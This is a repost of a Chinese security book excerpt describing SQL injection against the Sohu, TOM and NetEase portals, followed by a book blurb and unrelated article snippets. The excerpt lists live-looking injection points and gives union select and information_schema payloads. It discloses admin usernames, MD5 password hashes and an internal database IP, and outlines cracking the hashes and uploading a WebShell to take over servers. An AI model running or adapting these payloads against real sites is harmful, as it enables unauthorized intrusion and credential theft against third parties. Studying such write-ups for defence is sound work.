对搜狐、网易和TOM三大门户网站的SQL注入漏洞检测

news/2024/5/13 17:55:09/文章来源:https://blog.csdn.net/weixin_30588729/article/details/98776679

对搜狐、网易和TOM三大门户网站的SQL注入漏洞检测

本文节选自《大中型网络入侵要案直击与防御》一书

 

此外,笔者对搜狐及TOM和网易这三大门户网站作了注入攻击检测,发现同样存在明显的注入漏洞,安全性很糟糕。

1.MySQL注入检测搜狐门户网站

首先,来看看搜狐网站,搜狐网站上的动态网页大部分是采用PHP语言编写的,同样注入也很多。例如:

http://app.sh.sohu.com/lo***l/s.php?id=636

这个网页是一个欧莱雅广告页面,未对提交的数字参数进行检测,可直接利用SQL注入获得当前数据版本、库名、用户等信息。首先,通过Order by查询获得字段数目为9,然后通过union select查询可获得数据库的各种信息(图241):

http://app.sh.sohu.com/lo***l/s.php?id=636 and 1=2 union select 1,2,group_concat(user(),0x7C7C,version(),0x7C7C,database()),4,5,6,7,8,9

clip_image002

图241 搜狐网站SQL注入查询数据库信息

可得到当前数据库用户名为admin,数据库服务器地址为10.10.82.159,数据库版本为Mysql 5.0.27,当前数据库名为sohush。

再进一步检测,发现其中存在几个非常重要的数据库,包括:dvbbs、love008。前者是论坛数据库,后者是2008专题数据库。在论坛数据库中,可猜解出管理员账号和密码为:jim、4591b******ee2b5。在love008数据库中猜解出两个管理员用户和密码分别为(图242):

admin 21232f297a*****743894a0e4a801fc3

es 3e4a632cb*****8fc2386fa5f8e4bd76

clip_image004

图242 猜解出管理员账号与密码

虽然说管理员密码都是MD5加密的,不过现在网上有20G的彩虹表下载,破解这些普通密码MD5值并不是太困难的事情。通过后台登陆,攻击者可以想方设法上传WebShell并进行提权与进一步渗透入侵操作。

此外,在搜狐网站中还有非常多的SQL注入点,举例如下:

注入点1(图243):http://card.money.****.com/yh/card_product.php?id=71

注入点2:http://blog.club.****.com/list_diary_detail.php?artid=43761&db=blog002P4&kindid=3403

注入点3:http://blog.club.****.com/list_diary.php?db=blog001P3&kindid=529

注入点4:http://mini***.163.com/2009/0909/wuliangye/article.php?id=13

注入点5:http://blog.club.****.com/list_diary.php?db=blog001P3&kindid=529

注入点6:http://people.business.****.com/person/plist.php?userid=2047

注入点7:http://minisite.it.****.com/minisite/site849/photodetail1.jsp?corpID=849&status=browse&privCode=04&pictureID=57275

注入点8:http://zj.svip.****.com/news/2010/duanxindasai/item_list.php?category_id=1905

clip_image006

图243 搜狐注入点查询数据库信息

2.MySQL注入检测TOM门户网站

TOM也是国内一大门户网站,在对TOM门户网站进行检测的过程中,也发现了许多严重的SQL注入漏洞,而且危害性非常大,直接导致攻击者登陆后台上传木马获得WebShell,并进一步控制整个网站服务器!

TOM网站的注入点地址为:

http://qd**.tom.com/blog_content.php?blogid=482

直接用Order by进行查询时,会出错并跳转到网站首页,可使用--终止符号进行隔断处理,执行如下查询:

http://qd**.tom.com/blog_content.php?blogid=482 order by 14--

返回正常页面,得到字段数为14。再执行如下查询(图244):

http://qd**.tom.com/blog_content.php?blogid=482 and 1=2 union select 1,2,3,group_concat(user(),0x7C7C,version(),0x7C7C,database()),4,5,6,7,8,9,10,11,12,13,14%20--

clip_image008

图244 union联合查询获得数据库相关信息

得到当前数据库版本、数据库名和用户。再爆出当前数据库中的所有表名,提交如下查询:

http://qd**.tom.com/blog_content.php?blogid=482 and 1=2 union select 1,2,3,4,group_concat(table_name),5,6,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--

clip_image010

图245 查询到所有表名

在页面返回信息中,即可得到所有表名(图245)。在其中有名为adminuser的表名,表中很可能包含了管理员账号及密码,查询该表中的列名,可提交如下查询:

http://qd**.tom.com/blog_content.php?blogid=482 and 1=2 union select 1,2,3,4,group_concat(column_name),5,6,7,8,9,10,11,12,13,14 from information_schema.columns where table_name=(0x61646D696E75736572)--

clip_image012

图246 返回用户名及密码数据列

从页面返回信息中,可以看到用户名及密码列为username和pw(图246)。现在要爆出用户名和密码的数据值,提交如下查询语句:

http://qd**.tom.com/blog_content.php?blogid=482 and 1=2 union select 1,2,3,4,group_concat(username,0x7C,pw),5,6,7,8,9,10,11,12,13,14 from adminuser--

clip_image014

图247 获得管理员账号密码信息

从返回的页面信息中,可看到管理员用户名为qdjxlq,密码为3631137b9b0e47608c4ece9decc9a607(图247)。密码是经过MD5加密的32密文,破解并不是很困难。得到后台管理员账号密码后,再寻找后台登陆地址,得到后台登陆链接地址为(图248):

http://qd**.tom.com/admin/admin_login.php

clip_image016

图248 管理员后台登陆页面

登陆后台获得WebShell后,就可以进一步入侵控制服务器并进行渗透攻击。

3.MySQL注入检测网易门户网站

在对国内其它门户网站进行检测时发现,有许多网站也同样存在着SQL注入漏洞,例如在网易中存在如下注入点链接地址:

http://min****e.163.com/2009/0909/wuliangye/article.php?id=13

通过order by查询可得到字段数,再通过提交如下查询:

http://min****e.163.com/2009/0909/wuliangye/article.php?id=13%20and%201=2%20union%20select%201,database(),user(),version(),5,6,7,8

即可得到数据库版本、用户名和数据库名信息(图249)。由于数据库为Mysql 4.0版本,因此不能直接爆出数据表名,只有靠字典一个个进行猜解,猜解起来比较麻烦。

clip_image018

图249 网易注入点猜解示例

 


书名:大中型网络入侵要案直击与防御

作者:肖遥 编著

ISBN 978-7-121-11740-4

出版日期:2010年10

定价:79.00

开本:16

页码:624

作者简介

肖遥,网名“冰河洗剑”,国内著名网络安全技术独立研究人士。

曾从事国防军工设计,参与过J10A、J11B等战斗机配套武器研制,独立开发出HF25火箭发射器,参与DF8GA及导弹发射架等武器设计。

潜心钻研网络安全技术10余年,长期担任国内多家著名网站的安全顾问,专业从事网络渗透测试与网络风险评估。

长年在《黑客X档案》、《黑客防线》等国内安全专业媒体上与同行分享最新研究成果。出版有《网络渗透攻击与安防修炼》、《网站入侵与脚本安全攻防修炼》、《黑客大曝光》、《黑客攻防大揭秘》等多部安全类畅销技术专著。其中,《网站入侵与脚本安全攻防修炼》一书已输出至中国台湾等地。

本书以解析各种网络环境下攻防案例的形式来讲解各种网络攻击与防护技术,从“黑客攻击”与“安全工作者防守”双向角度来进行介绍。每一章节的内容按照如下脉络展开:典型攻防案例再现→案例的简单分析→黑客攻击技术的系统讲解→网管安全防护解决方案→入侵手法与防护难点深度分析。全书真实呈现完整的攻击与防护事件,可让读者了解到攻击者如何选择攻击目标,如何制订攻击方案,如何绕过攻击中碰到的问题,网管通常采用哪些防护手法,安全漏洞在何处,网管又如何追踪攻击者,等等,因此对学习者和工作者来说都很有吸引力和参考价值。

本书是网络管理员、信息安全管理员、对网络安全感兴趣的人员必备的参考书,也可供大中院校或培训学校教师和学生阅读和参考。

转载于:https://www.cnblogs.com/broadview/archive/2010/10/28/1863242.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_742519.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【电商网站优化提升】单页商品seo优化方法

一个单页怎么去优化?单页面就是一个网站里面只有一个页面组成,没有其他多个页面的跳转的点击。因为单页面网站内容比较固定和简单,那么这就增大了我们SEO优化工作人员的优化难度。,单页网站的来历已经源远流长了, 单页网站广泛用于…

部署html项目到Ubuntu,Ubuntu20.04安装配置java和tomcat部署静态html网站方法

Ubuntu20.04安装配置java和tomcat部署静态html网站方法一、JAVA的配置Java JDK在linux系统有两个版本,一个开源版本Openjdk,还有一个oracle官方版本jdk,oracle JDK既可以通过添加ppa源命令行安装,也可以去官网下载jdk压缩包安装。…

【转】如何进行网站策划

很翔实的如何进行网站策划教程,想做一个像样儿网站的朋友值得一看。另外推荐一本书《用户体验的要素》,网站策划必读。 一,首先需要明白的是:网站设计与网站策划的区别。 1.做策划,不再是只关注表现,复杂的…

网站分析系统

转载于:https://www.cnblogs.com/tippoint/archive/2012/09/06/2673522.html

采用Visual Stuidio 2010 创建网站栏

采用Visual Stuidio 2010 创建网站栏 Visual Stuidio 2010 该项目模板使创建网站栏/内容类型和列表变得非常方便。1. 管理员身份打开Visual Stuidio 2010,新建项目。2. 选择空白SharePoint项目,命名MyFirstListDefinition。3. 部署场解决方式&#xff0c…

网站导航颜色停留_成都金融企业营销型网站建设应注意哪些方面?

成都金融企业营销型网站建设每个行业都想依托互联网来达到理想的网络营销转型,通过互联网电商模式打破僵局,拓宽市场渠道,降低营销成本,提高企业品牌影响力。怎么做金融企业营销型网站建设,对于金融企业来说&#xff0…

汽车维修改装网站_富县交警大队联合运管部门查处货车改装窝点

10月26日,富县公安局交警大队在辖区交通运管部门的密切配合下,集中开展货车非法改装专项整治工作,突击检查货车违法改装违法行为,成功端掉违法拼改装窝点1个。当日上午,由富县车管所牵头,联合辖区中队和交通…

鄙视这些垃圾网站,居然篡改俺的注册表,实在气愤

不知是哪天,同事拿我本本上网下东西,可能是下什么东西吧,上了verycd。265。com(为了不给它出现连接的机会故意把.改为。)居然把我注册表都修改了,着实气愤,,而且在ie选项的主页设置里…

阿里云Ubuntu部署网站

1.配置环境 wget http://soft.vpser.net/lnmp/lnmp1.5.tar.gz -cO lnmp1.5.tar.gz && tar zxf lnmp1.5.tar.gz && cd lnmp1.5 && ./install.sh lnmp2.选择安装默认版本即可 MySQL 5.5.60 PHP 5.6.36 Apache 2.4.33 3.完成后可输入 sudo lnmp -v 查询…

22个奢侈品网站4类风貌

随着经济发展,国人生活水平提高,对物质和生活产品质量要求也越来越高,珠宝、钻石这类奢侈品也逐渐走向大众视野,如今以奢侈产品为主题的网站和品牌纷纷在国内立足,这些网站域名各异,包含拼音域名、创意域名…

分享18个常用的网站性能测试工具

网站的加载速度是决定网站等级的重要因素,值得站长特别关注。原因很简单,没有人愿意为了打开一个网页而等老半天,换句话说,如果你的网站打开速度很慢,将流失大量的访客,甚至出现多米诺效应的不良影响。在埋…

网站图片防盗链,图片水印2

构建一般处理程序 View Code using System; using System.Collections.Generic; using System.Linq; using System.Web;using System.Drawing; using System.IO;namespace BookShop.Web {public class gwatermark : IHttpHandler{private const string WATERMARK_URL "~…

关于网站下拉导航的设置

网站的导航很多都是下拉的方式&#xff0c;如下图所示&#xff1a; 就是一种下拉菜单&#xff0c;导航的数据是以ul、li相互嵌套的方式存在的。 ------------------------------------------ <div class"head"><div class"logo"></div>&…

《高性能网站建设指南》阅读体会

今日阅读了《高性能网站建设指南》一书&#xff0c;该书的作者Steve Souders"为Yahoo!的开发团队构建了YSlow"。YSlow是Web页面性能分析工具&#xff0c;可以集成至Firebug&#xff0c;非常好用。书和工具是配套的&#xff0c;工具会在线更新&#xff0c;书印出来就不…

搭建个人博客网站

云服务器WordPress一键部署博客 使用这种方式需要的时间较长&#xff0c;需要域名备案等&#xff0c;如果没有时间的话可以采用Hexo-Gitee搭建个人博客 1、购买云服务器 购买地点有阿里云、腾讯云、华为云等等 阿里云&#xff1a;https://www.aliyun.com/ 腾讯云&#xff1…

运行网站项目时,有时出现Bad Request,该怎么解决?

有时运行网站项目时&#xff0c;出现Bad Request问题 解决方法 清除浏览器的缓存&#xff0c;重新刷新页面就好了 如&#xff1a;火狐 转载于:https://www.cnblogs.com/xielong/p/8007229.html

PS网站切图

step1:在photoshop中打开设计稿&#xff0c;如下图选择工具板上的slice切片工具&#xff0c;先大刀阔斧的切上一番!技巧&#xff1a; 大面积的色块单独切成一块&#xff0c;尽可能的保持在水平线上的整齐(这个问题你们在后面的制作页面中深有感触)切好的图如下所示&#xff1a;…

pyton简单网络爬虫,aspx网站中form使用到了__VIEWSTATE、__EVENTVALIDATION、cookie来验证的提交...

一、需求最近在学习Python&#xff0c;刚好有一个需求&#xff0c;需要从一个本地密码管理系统获取本地账号的密码 。之前的流程是 登录web-----输入计算机名-----管理员账号、密码---提交------页面返回密码&#xff0c;复制密码&#xff0c;发送邮件给请求用户。每次都要登录…

个人博客如何搭建 用什么系统好?学网站建设从开发一个博客开始

今天给大家分享一下关于个人博客方面的知识&#xff0c;什么是博客&#xff1f;博客其实就是日记&#xff0c;以前没有互联网的时候&#xff0c;人们把自己的心事和工作喜欢记录在笔记本里&#xff0c;后来互联网发展起来&#xff0c;互联网提倡分享&#xff0c;人们就把自己相…

Bootstrap 常用网站

https://www.bootcss.com/ 中文官方文档 https://www.bootcdn.cn/ BootCDN http://www.fontawesome.com.cn/ fontawesome https://github.com/lipis/bootstrap-sweetalert sweetalert 路径 转载于:https://www.cnblogs.com/wt7018/p/11191656.html